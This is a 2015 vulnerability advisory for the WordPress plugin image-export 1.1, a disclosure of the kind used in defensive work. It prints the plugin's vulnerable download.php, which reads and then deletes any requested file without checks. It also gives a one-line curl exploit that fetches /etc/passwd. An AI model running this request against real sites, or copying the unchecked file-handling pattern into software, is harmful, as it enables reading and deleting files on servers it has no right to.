WordPress Image Export 1.1 Arbitrary File Download

`Title: Remote file download vulnerability in Wordpress Plugin image-export v1.1  
Author: Larry W. Cashdollar, @_larry0  
Date: 2015-07-01  
Download Site: https://wordpress.org/plugins/image-export  
Vendor: www.1efthander.com  
Vendor Notified: 2015-07-05  
Vendor Contact: https://twitter.com/1eftHander  
Description: Image Export plugin can help you selectively download images uploaded by an administrator .  
Vulnerability:  
The code in file download.php doesn't do any checking that the user is requesting files from the uploaded images directory only. And line 8 attempts to  
unlink the file after being downloaded. This script could be used to delete files out of the wordpress directory if file permissions allow.  
  
1 <?php  
2 if ( isset( $_REQUEST['file'] ) && !empty( $_REQUEST['file'] ) ) {  
3 $file = $_GET['file'];  
4   
5 header( 'Content-Type: application/zip' );  
6 header( 'Content-Disposition: attachment; filename="' . $file . '"' );  
7 readfile( $file );  
8 unlink( $file );  
9   
10 exit;  
11 }  
12 ?>  
CVEID: TBD  
Exploit Code:  
• $ curl http://example.com/wp-content/plugins/image-export/download.php?file=/etc/passwd  
Screen Shots:  
Advisory: http://www.vapid.dhs.org/advisory.php?v=135  
  
  
`